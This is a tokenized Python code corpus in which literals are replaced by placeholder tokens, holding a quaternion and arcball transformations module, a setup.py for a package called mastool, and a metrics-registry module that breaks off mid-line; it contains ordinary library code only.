<EOL> ax = math . atan2 ( M [ k , j ] , M [ k , k ] ) <EOL> ay = math . atan2 ( - M [ k , i ] , cy ) <EOL> az = math . atan2 ( M [ j , i ] , M [ i , i ] ) <EOL> else : <EOL> ax = math . atan2 ( - M [ j , k ] , M [ j , j ] ) <EOL> ay = math . atan2 ( - M [ k , i ] , cy ) <EOL> az = <NUM_LIT:0.0> <EOL> if parity : <EOL> ax , ay , az = - ax , - ay , - az <EOL> if frame : <EOL> ax , az = az , ax <EOL> return ax , ay , az <EOL> def euler_from_quaternion ( quaternion , axes = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return euler_from_matrix ( quaternion_matrix ( quaternion ) , axes ) <EOL> def quaternion_from_euler ( ai , aj , ak , axes = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> firstaxis , parity , repetition , frame = _AXES2TUPLE [ axes . lower ( ) ] <EOL> except ( AttributeError , KeyError ) : <EOL> _ = _TUPLE2AXES [ axes ] <EOL> firstaxis , parity , repetition , frame = axes <EOL> i = firstaxis <EOL> j = _NEXT_AXIS [ i + parity ] <EOL> k = _NEXT_AXIS [ i - parity + <NUM_LIT:1> ] <EOL> if frame : <EOL> ai , ak = ak , ai <EOL> if parity : <EOL> aj = - aj <EOL> ai /= <NUM_LIT> <EOL> aj /= <NUM_LIT> <EOL> ak /= <NUM_LIT> <EOL> ci = math . cos ( ai ) <EOL> si = math . sin ( ai ) <EOL> cj = math . cos ( aj ) <EOL> sj = math . sin ( aj ) <EOL> ck = math . cos ( ak ) <EOL> sk = math . sin ( ak ) <EOL> cc = ci * ck <EOL> cs = ci * sk <EOL> sc = si * ck <EOL> ss = si * sk <EOL> quaternion = numpy . empty ( ( <NUM_LIT:4> , ) , dtype = numpy . float64 ) <EOL> if repetition : <EOL> quaternion [ i ] = cj * ( cs + sc ) <EOL> quaternion [ j ] = sj * ( cc + ss ) <EOL> quaternion [ k ] = sj * ( cs - sc ) <EOL> quaternion [ <NUM_LIT:3> ] = cj * ( cc - ss ) <EOL> else : <EOL> quaternion [ i ] = cj * sc - sj * cs <EOL> quaternion [ j ] = cj * ss + sj * cc <EOL> quaternion [ k ] = cj * cs - sj * sc <EOL> quaternion [ <NUM_LIT:3> ] = cj * cc + sj * ss <EOL> if parity : <EOL> quaternion [ j ] *= - <NUM_LIT:1> <EOL> return quaternion <EOL> def quaternion_about_axis ( angle , axis ) : <EOL> """<STR_LIT>""" <EOL> quaternion = numpy . zeros ( ( <NUM_LIT:4> , ) , dtype = numpy . float64 ) <EOL> quaternion [ : <NUM_LIT:3> ] = axis [ : <NUM_LIT:3> ] <EOL> qlen = vector_norm ( quaternion ) <EOL> if qlen > _EPS : <EOL> quaternion *= math . sin ( angle / <NUM_LIT> ) / qlen <EOL> quaternion [ <NUM_LIT:3> ] = math . cos ( angle / <NUM_LIT> ) <EOL> return quaternion <EOL> def quaternion_matrix ( quaternion ) : <EOL> """<STR_LIT>""" <EOL> q = numpy . array ( quaternion [ : <NUM_LIT:4> ] , dtype = numpy . float64 , copy = True ) <EOL> nq = numpy . dot ( q , q ) <EOL> if nq < _EPS : <EOL> return numpy . identity ( <NUM_LIT:4> ) <EOL> q *= math . sqrt ( <NUM_LIT> / nq ) <EOL> q = numpy . outer ( q , q ) <EOL> return numpy . array ( ( <EOL> ( <NUM_LIT:1.0> - q [ <NUM_LIT:1> , <NUM_LIT:1> ] - q [ <NUM_LIT:2> , <NUM_LIT:2> ] , q [ <NUM_LIT:0> , <NUM_LIT:1> ] - q [ <NUM_LIT:2> , <NUM_LIT:3> ] , q [ <NUM_LIT:0> , <NUM_LIT:2> ] + q [ <NUM_LIT:1> , <NUM_LIT:3> ] , <NUM_LIT:0.0> ) , <EOL> ( q [ <NUM_LIT:0> , <NUM_LIT:1> ] + q [ <NUM_LIT:2> , <NUM_LIT:3> ] , <NUM_LIT:1.0> - q [ <NUM_LIT:0> , <NUM_LIT:0> ] - q [ <NUM_LIT:2> , <NUM_LIT:2> ] , q [ <NUM_LIT:1> , <NUM_LIT:2> ] - q [ <NUM_LIT:0> , <NUM_LIT:3> ] , <NUM_LIT:0.0> ) , <EOL> ( q [ <NUM_LIT:0> , <NUM_LIT:2> ] - q [ <NUM_LIT:1> , <NUM_LIT:3> ] , q [ <NUM_LIT:1> , <NUM_LIT:2> ] + q [ <NUM_LIT:0> , <NUM_LIT:3> ] , <NUM_LIT:1.0> - q [ <NUM_LIT:0> , <NUM_LIT:0> ] - q [ <NUM_LIT:1> , <NUM_LIT:1> ] , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> ) <EOL> ) , dtype = numpy . float64 ) <EOL> def quaternion_from_matrix ( matrix ) : <EOL> """<STR_LIT>""" <EOL> q = numpy . empty ( ( <NUM_LIT:4> , ) , dtype = numpy . float64 ) <EOL> M = numpy . array ( matrix , dtype = numpy . float64 , copy = False ) [ : <NUM_LIT:4> , : <NUM_LIT:4> ] <EOL> t = numpy . trace ( M ) <EOL> if t > M [ <NUM_LIT:3> , <NUM_LIT:3> ] : <EOL> q [ <NUM_LIT:3> ] = t <EOL> q [ <NUM_LIT:2> ] = M [ <NUM_LIT:1> , <NUM_LIT:0> ] - M [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> q [ <NUM_LIT:1> ] = M [ <NUM_LIT:0> , <NUM_LIT:2> ] - M [ <NUM_LIT:2> , <NUM_LIT:0> ] <EOL> q [ <NUM_LIT:0> ] = M [ <NUM_LIT:2> , <NUM_LIT:1> ] - M [ <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> else : <EOL> i , j , k = <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> <EOL> if M [ <NUM_LIT:1> , <NUM_LIT:1> ] > M [ <NUM_LIT:0> , <NUM_LIT:0> ] : <EOL> i , j , k = <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> <EOL> if M [ <NUM_LIT:2> , <NUM_LIT:2> ] > M [ i , i ] : <EOL> i , j , k = <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:1> <EOL> t = M [ i , i ] - ( M [ j , j ] + M [ k , k ] ) + M [ <NUM_LIT:3> , <NUM_LIT:3> ] <EOL> q [ i ] = t <EOL> q [ j ] = M [ i , j ] + M [ j , i ] <EOL> q [ k ] = M [ k , i ] + M [ i , k ] <EOL> q [ <NUM_LIT:3> ] = M [ k , j ] - M [ j , k ] <EOL> q *= <NUM_LIT:0.5> / math . sqrt ( t * M [ <NUM_LIT:3> , <NUM_LIT:3> ] ) <EOL> return q <EOL> def quaternion_multiply ( quaternion1 , quaternion0 ) : <EOL> """<STR_LIT>""" <EOL> x0 , y0 , z0 , w0 = quaternion0 <EOL> x1 , y1 , z1 , w1 = quaternion1 <EOL> return numpy . array ( ( <EOL> x1 * w0 + y1 * z0 - z1 * y0 + w1 * x0 , <EOL> - x1 * z0 + y1 * w0 + z1 * x0 + w1 * y0 , <EOL> x1 * y0 - y1 * x0 + z1 * w0 + w1 * z0 , <EOL> - x1 * x0 - y1 * y0 - z1 * z0 + w1 * w0 ) , dtype = numpy . float64 ) <EOL> def quaternion_conjugate ( quaternion ) : <EOL> """<STR_LIT>""" <EOL> return numpy . array ( ( - quaternion [ <NUM_LIT:0> ] , - quaternion [ <NUM_LIT:1> ] , <EOL> - quaternion [ <NUM_LIT:2> ] , quaternion [ <NUM_LIT:3> ] ) , dtype = numpy . float64 ) <EOL> def quaternion_inverse ( quaternion ) : <EOL> """<STR_LIT>""" <EOL> return quaternion_conjugate ( quaternion ) / numpy . dot ( quaternion , quaternion ) <EOL> def quaternion_slerp ( quat0 , quat1 , fraction , spin = <NUM_LIT:0> , shortestpath = True ) : <EOL> """<STR_LIT>""" <EOL> q0 = unit_vector ( quat0 [ : <NUM_LIT:4> ] ) <EOL> q1 = unit_vector ( quat1 [ : <NUM_LIT:4> ] ) <EOL> if fraction == <NUM_LIT:0.0> : <EOL> return q0 <EOL> elif fraction == <NUM_LIT:1.0> : <EOL> return q1 <EOL> d = numpy . dot ( q0 , q1 ) <EOL> if abs ( abs ( d ) - <NUM_LIT:1.0> ) < _EPS : <EOL> return q0 <EOL> if shortestpath and d < <NUM_LIT:0.0> : <EOL> d = - d <EOL> q1 *= - <NUM_LIT:1.0> <EOL> angle = math . acos ( d ) + spin * math . pi <EOL> if abs ( angle ) < _EPS : <EOL> return q0 <EOL> isin = <NUM_LIT:1.0> / math . sin ( angle ) <EOL> q0 *= math . sin ( ( <NUM_LIT:1.0> - fraction ) * angle ) * isin <EOL> q1 *= math . sin ( fraction * angle ) * isin <EOL> q0 += q1 <EOL> return q0 <EOL> def random_quaternion ( rand = None ) : <EOL> """<STR_LIT>""" <EOL> if rand is None : <EOL> rand = numpy . random . rand ( <NUM_LIT:3> ) <EOL> else : <EOL> assert len ( rand ) == <NUM_LIT:3> <EOL> r1 = numpy . sqrt ( <NUM_LIT:1.0> - rand [ <NUM_LIT:0> ] ) <EOL> r2 = numpy . sqrt ( rand [ <NUM_LIT:0> ] ) <EOL> pi2 = math . pi * <NUM_LIT> <EOL> t1 = pi2 * rand [ <NUM_LIT:1> ] <EOL> t2 = pi2 * rand [ <NUM_LIT:2> ] <EOL> return numpy . array ( ( numpy . sin ( t1 ) * r1 , <EOL> numpy . cos ( t1 ) * r1 , <EOL> numpy . sin ( t2 ) * r2 , <EOL> numpy . cos ( t2 ) * r2 ) , dtype = numpy . float64 ) <EOL> def random_rotation_matrix ( rand = None ) : <EOL> """<STR_LIT>""" <EOL> return quaternion_matrix ( random_quaternion ( rand ) ) <EOL> class Arcball ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , initial = None ) : <EOL> """<STR_LIT>""" <EOL> self . _axis = None <EOL> self . _axes = None <EOL> self . _radius = <NUM_LIT:1.0> <EOL> self . _center = [ <NUM_LIT:0.0> , <NUM_LIT:0.0> ] <EOL> self . _vdown = numpy . array ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] , dtype = numpy . float64 ) <EOL> self . _constrain = False <EOL> if initial is None : <EOL> self . _qdown = numpy . array ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] , dtype = numpy . float64 ) <EOL> else : <EOL> initial = numpy . array ( initial , dtype = numpy . float64 ) <EOL> if initial . shape == ( <NUM_LIT:4> , <NUM_LIT:4> ) : <EOL> self . _qdown = quaternion_from_matrix ( initial ) <EOL> elif initial . shape == ( <NUM_LIT:4> , ) : <EOL> initial /= vector_norm ( initial ) <EOL> self . _qdown = initial <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> self . _qnow = self . _qpre = self . _qdown <EOL> def place ( self , center , radius ) : <EOL> """<STR_LIT>""" <EOL> self . _radius = float ( radius ) <EOL> self . _center [ <NUM_LIT:0> ] = center [ <NUM_LIT:0> ] <EOL> self . _center [ <NUM_LIT:1> ] = center [ <NUM_LIT:1> ] <EOL> def setaxes ( self , * axes ) : <EOL> """<STR_LIT>""" <EOL> if axes is None : <EOL> self . _axes = None <EOL> else : <EOL> self . _axes = [ unit_vector ( axis ) for axis in axes ] <EOL> def setconstrain ( self , constrain ) : <EOL> """<STR_LIT>""" <EOL> self . _constrain = constrain == True <EOL> def getconstrain ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _constrain <EOL> def down ( self , point ) : <EOL> """<STR_LIT>""" <EOL> self . _vdown = arcball_map_to_sphere ( point , self . _center , self . _radius ) <EOL> self . _qdown = self . _qpre = self . _qnow <EOL> if self . _constrain and self . _axes is not None : <EOL> self . _axis = arcball_nearest_axis ( self . _vdown , self . _axes ) <EOL> self . _vdown = arcball_constrain_to_axis ( self . _vdown , self . _axis ) <EOL> else : <EOL> self . _axis = None <EOL> def drag ( self , point ) : <EOL> """<STR_LIT>""" <EOL> vnow = arcball_map_to_sphere ( point , self . _center , self . _radius ) <EOL> if self . _axis is not None : <EOL> vnow = arcball_constrain_to_axis ( vnow , self . _axis ) <EOL> self . _qpre = self . _qnow <EOL> t = numpy . cross ( self . _vdown , vnow ) <EOL> if numpy . dot ( t , t ) < _EPS : <EOL> self . _qnow = self . _qdown <EOL> else : <EOL> q = [ t [ <NUM_LIT:0> ] , t [ <NUM_LIT:1> ] , t [ <NUM_LIT:2> ] , numpy . dot ( self . _vdown , vnow ) ] <EOL> self . _qnow = quaternion_multiply ( q , self . _qdown ) <EOL> def next ( self , acceleration = <NUM_LIT:0.0> ) : <EOL> """<STR_LIT>""" <EOL> q = quaternion_slerp ( self . _qpre , self . _qnow , <NUM_LIT> + acceleration , False ) <EOL> self . _qpre , self . _qnow = self . _qnow , q <EOL> def matrix ( self ) : <EOL> """<STR_LIT>""" <EOL> return quaternion_matrix ( self . _qnow ) <EOL> def arcball_map_to_sphere ( point , center , radius ) : <EOL> """<STR_LIT>""" <EOL> v = numpy . array ( ( ( point [ <NUM_LIT:0> ] - center [ <NUM_LIT:0> ] ) / radius , <EOL> ( center [ <NUM_LIT:1> ] - point [ <NUM_LIT:1> ] ) / radius , <EOL> <NUM_LIT:0.0> ) , dtype = numpy . float64 ) <EOL> n = v [ <NUM_LIT:0> ] * v [ <NUM_LIT:0> ] + v [ <NUM_LIT:1> ] * v [ <NUM_LIT:1> ] <EOL> if n > <NUM_LIT:1.0> : <EOL> v /= math . sqrt ( n ) <EOL> else : <EOL> v [ <NUM_LIT:2> ] = math . sqrt ( <NUM_LIT:1.0> - n ) <EOL> return v <EOL> def arcball_constrain_to_axis ( point , axis ) : <EOL> """<STR_LIT>""" <EOL> v = numpy . array ( point , dtype = numpy . float64 , copy = True ) <EOL> a = numpy . array ( axis , dtype = numpy . float64 , copy = True ) <EOL> v -= a * numpy . dot ( a , v ) <EOL> n = vector_norm ( v ) <EOL> if n > _EPS : <EOL> if v [ <NUM_LIT:2> ] < <NUM_LIT:0.0> : <EOL> v *= - <NUM_LIT:1.0> <EOL> v /= n <EOL> return v <EOL> if a [ <NUM_LIT:2> ] == <NUM_LIT:1.0> : <EOL> return numpy . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , dtype = numpy . float64 ) <EOL> return unit_vector ( [ - a [ <NUM_LIT:1> ] , a [ <NUM_LIT:0> ] , <NUM_LIT:0> ] ) <EOL> def arcball_nearest_axis ( point , axes ) : <EOL> """<STR_LIT>""" <EOL> point = numpy . array ( point , dtype = numpy . float64 , copy = False ) <EOL> nearest = None <EOL> mx = - <NUM_LIT:1.0> <EOL> for axis in axes : <EOL> t = numpy . dot ( arcball_constrain_to_axis ( point , axis ) , point ) <EOL> if t > mx : <EOL> nearest = axis <EOL> mx = t <EOL> return nearest <EOL> _EPS = numpy . finfo ( float ) . eps * <NUM_LIT> <EOL> _NEXT_AXIS = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> _AXES2TUPLE = { <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) , '<STR_LIT>' : ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) , '<STR_LIT>' : ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> ) , '<STR_LIT>' : ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) , '<STR_LIT>' : ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) , '<STR_LIT>' : ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> ) , '<STR_LIT>' : ( <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) , '<STR_LIT>' : ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) , '<STR_LIT>' : ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) , '<STR_LIT>' : ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> ) , '<STR_LIT>' : ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) , '<STR_LIT>' : ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) , '<STR_LIT>' : ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ) , '<STR_LIT>' : ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) , '<STR_LIT>' : ( <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> ) , '<STR_LIT>' : ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ) , '<STR_LIT>' : ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) } <EOL> _TUPLE2AXES = dict ( ( v , k ) for k , v in _AXES2TUPLE . items ( ) ) <EOL> def vector_norm ( data , axis = None , out = None ) : <EOL> """<STR_LIT>""" <EOL> data = numpy . array ( data , dtype = numpy . float64 , copy = True ) <EOL> if out is None : <EOL> if data . ndim == <NUM_LIT:1> : <EOL> return math . sqrt ( numpy . dot ( data , data ) ) <EOL> data *= data <EOL> out = numpy . atleast_1d ( numpy . sum ( data , axis = axis ) ) <EOL> numpy . sqrt ( out , out ) <EOL> return out <EOL> else : <EOL> data *= data <EOL> numpy . sum ( data , axis = axis , out = out ) <EOL> numpy . sqrt ( out , out ) <EOL> def unit_vector ( data , axis = None , out = None ) : <EOL> """<STR_LIT>""" <EOL> if out is None : <EOL> data = numpy . array ( data , dtype = numpy . float64 , copy = True ) <EOL> if data . ndim == <NUM_LIT:1> : <EOL> data /= math . sqrt ( numpy . dot ( data , data ) ) <EOL> return data <EOL> else : <EOL> if out is not data : <EOL> out [ : ] = numpy . array ( data , copy = False ) <EOL> data = out <EOL> length = numpy . atleast_1d ( numpy . sum ( data * data , axis ) ) <EOL> numpy . sqrt ( length , length ) <EOL> if axis is not None : <EOL> length = numpy . expand_dims ( length , axis ) <EOL> data /= length <EOL> if out is None : <EOL> return data <EOL> def random_vector ( size ) : <EOL> """<STR_LIT>""" <EOL> return numpy . random . random ( size ) <EOL> def inverse_matrix ( matrix ) : <EOL> """<STR_LIT>""" <EOL> return numpy . linalg . inv ( matrix ) <EOL> def concatenate_matrices ( * matrices ) : <EOL> """<STR_LIT>""" <EOL> M = numpy . identity ( <NUM_LIT:4> ) <EOL> for i in matrices : <EOL> M = numpy . dot ( M , i ) <EOL> return M <EOL> def is_same_transform ( matrix0 , matrix1 ) : <EOL> """<STR_LIT>""" <EOL> matrix0 = numpy . array ( matrix0 , dtype = numpy . float64 , copy = True ) <EOL> matrix0 /= matrix0 [ <NUM_LIT:3> , <NUM_LIT:3> ] <EOL> matrix1 = numpy . array ( matrix1 , dtype = numpy . float64 , copy = True ) <EOL> matrix1 /= matrix1 [ <NUM_LIT:3> , <NUM_LIT:3> ] <EOL> return numpy . allclose ( matrix0 , matrix1 ) <EOL> def _import_module ( module_name , warn = True , prefix = '<STR_LIT>' , ignore = '<STR_LIT:_>' ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> module = __import__ ( module_name ) <EOL> except ImportError : <EOL> if warn : <EOL> warnings . warn ( "<STR_LIT>" + module_name ) <EOL> else : <EOL> for attr in dir ( module ) : <EOL> if ignore and attr . startswith ( ignore ) : <EOL> continue <EOL> if prefix : <EOL> if attr in globals ( ) : <EOL> globals ( ) [ prefix + attr ] = globals ( ) [ attr ] <EOL> elif warn : <EOL> warnings . warn ( "<STR_LIT>" + attr ) <EOL> globals ( ) [ attr ] = getattr ( module , attr ) <EOL> return True </s>
<s> from setuptools import setup <EOL> from mastool import extension <EOL> url = '<STR_LIT>' . format ( <EOL> extension . __version__ ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> version = extension . __version__ , <EOL> description = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> download_url = url , <EOL> keywords = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> py_modules = [ '<STR_LIT>' ] , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } , <EOL> classifiers = [ ] , <EOL> ) </s>
<s> import functools <EOL> import re <EOL> import time <EOL> import sys <EOL> from . meters import Counter , Histogram , Meter , Timer , Gauge , CallbackGauge , SimpleGauge <EOL> class MetricsRegistry ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , clock = time ) : <EOL> """<STR_LIT>""" <EOL> self . _timers = { } <EOL> self . _meters = { } <EOL> self . _counters = { } <EOL> self . _histograms = { } <EOL> self . _gauges = { } <EOL> self . _clock = clock <EOL> def add ( self , key , metric ) : <EOL> """<STR_LIT>""" <EOL> class_map = ( <EOL> ( Histogram , self . _histograms ) , <EOL> ( Meter , self . _meters ) , <EOL> ( Gauge , self . _gauges ) , <EOL> ( Timer , self . _timers ) , <EOL> ( Counter , self . _counters ) , <EOL> ) <EOL> for cls , registry in class_map : <EOL> if isinstance ( metric , cls ) : <EOL> if key in registry : <EOL> raise LookupError ( "<STR_LIT>" % key ) <EOL> registry [ key ] = metric <EOL> return <EOL> raise TypeError ( "<STR_LIT>" % key ) <EOL> def counter ( self , key ) : <EOL> """<STR_LIT>""" <EOL> if key not in self . _counters : <EOL> self . _counters [ key ] = Counter ( ) <EOL> return self . _counters [ key ] <EOL> def histogram ( self , key ) : <EOL> """<STR_LIT>""" <EOL> if key not in self . _histograms : <EOL> self . _histograms [ key ] = Histogram ( clock = self . _clock ) <EOL> return self . _histograms [ key ] <EOL> def gauge ( self , key , gauge = None , default = float ( "<STR_LIT>" ) ) : <EOL> if key not in self . _gauges : <EOL> if gauge is None : <EOL> gauge = SimpleGauge ( <EOL> default ) <EOL> elif not isinstance ( gauge , Gauge ) : <EOL> if not callable ( gauge ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> gauge = CallbackGauge ( gauge ) <EOL> self . _gauges [ key ] = gauge <EOL> return self . _gauges [ key ] <EOL> def meter ( self , key ) : <EOL> """<STR_LIT>""" <EOL> if key not in self . _meters : <EOL> self . _meters [ key ] = Meter ( clock = self . _clock ) <EOL> return self . _meters [ key ] <EOL> def create_sink ( self ) : <EOL> return None <EOL> def timer ( self , key ) : <EOL> """<STR_LIT>""" <EOL> if key not in self . _timers : <EOL> self . _timers [ key ] = Timer ( clock = self . _clock , sink = self . create_sink ( ) ) <EOL> return self . _timers [ key ] <EOL> def clear ( self ) : <EOL> self . _meters . clear ( ) <EOL> self . _counters . clear ( ) <EOL> self . _gauges . clear ( ) <EOL> self . _timers . clear ( ) <EOL> self . _histograms . clear ( ) <EOL> def _get_counter_metrics ( self , key ) : <EOL> if key in self . _counters : <EOL> counter = self . _counters [ key ] <EOL> return { "<STR_LIT:count>" : counter . get_count ( ) } <EOL> return { } <EOL> def _get_gauge_metrics ( self , key ) : <EOL> if key in self . _gauges : <EOL> gauge = self . _gauges [ key ] <EOL> return { "<STR_LIT:value>" : gauge . get_value ( ) } <EOL> return { } <EOL> def _get_histogram_metrics ( self , key ) : <EOL> if key in self . _histograms : <EOL> histogram = self . _histograms [ key ] <EOL> snapshot = histogram . get_snapshot ( ) <EOL> res = { "<STR_LIT>" : histogram . get_mean ( ) , <EOL> "<STR_LIT:count>" : histogram . get_count ( ) , <EOL> "<STR_LIT>" : histogram . get_max ( ) , <EOL> "<STR_LIT>" : histogram . get_min ( ) , <EOL> "<STR_LIT>" : histogram . get_stddev ( ) , <EOL> "<STR_LIT>" : snapshot . get_75th_percentile ( ) , <EOL> "<STR_LIT>" : snapshot . get_95th_percentile ( ) , <EOL> "<STR_LIT>" : snapshot . get_99th_percentile ( ) , <EOL> "<STR_LIT>" : snapshot . get_999th_percentile ( ) } <EOL> return res <EOL> return { } <EOL> def _get_meter_metrics ( self , key ) : <EOL> if key in self . _meters : <EOL> meter = self . _meters [ key ] <EOL> res = { "<STR_LIT:count>" : meter . get_count ( ) , <EOL> "<STR_LIT>" : meter . get_fifteen_minute_rate ( ) , <EOL> "<STR_LIT>" : meter . get_five_minute_rate ( ) , <EOL> "<STR_LIT>" : meter . get_one_minute_rate ( ) , <EOL> "<STR_LIT>" : meter . get_mean_rate ( ) } <EOL> return res <EOL> return { } <EOL> def _get_timer_metrics ( self , key ) : <EOL> if key in self . _timers : <EOL> timer = self . _timers [ key ] <EOL> snapshot = timer . get_snapshot ( ) <EOL> res = { "<STR_LIT>" : timer . get_mean ( ) , <EOL> "<STR_LIT>" : timer . get_sum ( ) , <EOL> "<STR_LIT:count>" : timer . get_count ( ) , <EOL> "<STR_LIT>" : timer . get_max ( ) , <EOL> "<STR_LIT>" : timer . get_min ( ) , <EOL> "<STR_LIT>" : timer . get_stddev ( ) , <EOL> "<STR_LIT>" : timer . get_fifteen_minute_rate ( ) , <EOL> "<STR_LIT>" : timer . get_five_minute_rate ( ) , <EOL> "<STR_LIT>" : timer . get_one_minute_rate ( ) , <EOL> "<STR_LIT>" : timer . get_mean_rate ( ) , <EOL> "<STR_LIT>" : snapshot . get_median ( ) , <EOL> "<STR_LIT>" : snapshot . get_75th_percentile ( ) , <EOL> "<STR_LIT>" : snapshot . get_95th_percentile ( ) , <EOL> "<STR_LIT>" : snapshot . get_99th_percentile ( ) , <EOL> "<STR_LIT>" : snapshot . get_999th_percentile ( ) } <EOL> return res <EOL> return { } <EOL> def get_metrics ( self , key ) : <EOL> """<STR_LIT>""" <EOL> metrics = { } <EOL> for getter in ( self . _get_counter_metrics , self . _get_histogram_metrics , <EOL> self . _get_meter_metrics , self . _get_timer_metrics , <EOL> self . _get_gauge_metrics ) : <EOL> metrics . update ( getter ( key ) ) <EOL> return metrics <EOL> def dump_metrics ( self ) : <EOL> """<STR_LIT>""" <EOL> metrics = { } <EOL> for metric_type in ( self . _counters , <EOL> self . _histograms , <EOL> self . _meters , <EOL> self . _timers , <EOL> self . _gauges ) : <EOL> for key in metric_type . keys ( ) : <EOL> metrics [ key ] = self . get_metrics ( key ) <EOL> return metrics <EOL> class RegexRegistry ( MetricsRegistry ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , pattern = None , clock = time ) : <EOL> super ( RegexRegistry , self ) . __init__ ( clock ) <EOL> if pattern is not None : <EOL> self . pattern = re . compile ( pattern ) <EOL> else : <EOL> self . pattern = re . compile ( '<STR_LIT>' ) <EOL> def _get_key ( self , key ) : <EOL> matches = self . pattern . finditer ( key ) <EOL> key = '<STR_LIT:/>' . join ( ( v for match in matches for v in match . groups ( ) if v ) ) <EOL> return key <EOL> def timer ( self , key ) : <EOL> return super ( RegexRegistry , self ) . timer ( self . _get_key ( key ) ) <EOL> def histogram ( self , key ) : <EOL> return super ( RegexRegistry , self ) . histogram ( self . _get_key ( key ) ) <EOL> def counter ( self , key ) : <EOL> return super ( RegexRegistry , self ) . counter ( self . _get_key ( key ) ) <EOL> def gauge ( self , key , gauge = None ) : <EOL> return super ( RegexRegistry , self ) . gauge ( self . _get_key ( key ) , gauge ) <EOL> def meter ( self , key ) : <EOL> return super ( RegexRegistry , self ) . meter ( self . _get_key ( key ) ) <EOL> _global_registry = MetricsRegistry ( ) <EOL> def global_registry ( ) : <EOL> return _global_registry <EOL> def set_global_registry ( registry ) : <EOL> global _global_registry <EOL> _global_registry = registry <EOL> def counter ( key ) : <EOL> return _global_registry . counter ( key ) <EOL> def histogram ( key ) : <EOL> return _global_registry . histogram ( key ) <EOL> def meter ( key ) : <EOL> return _global_registry . meter ( key ) <EOL> def timer ( key ) : <EOL> return _global_registry . timer ( key ) <EOL> def gauge ( key , gauge = None ) : <EOL> return _global_registry . gauge ( key , gauge ) <EOL> def dump_metrics ( ) : <EOL> return _global_registry . dump_metrics ( ) <EOL> def clear ( ) : <EOL> return _global_registry . clear ( ) <EOL> def get_qualname ( obj ) : <EOL> if sys . version_info [ <NUM_LIT:0> ] > <NUM_LIT:2> : <EOL> return obj . __qualname__ <EOL> return obj . __name__ <EOL> def count_calls ( fn ) : <EOL> """<STR_LIT>""" <EOL> @ functools . wraps ( fn ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> counter ( "<STR_LIT>" 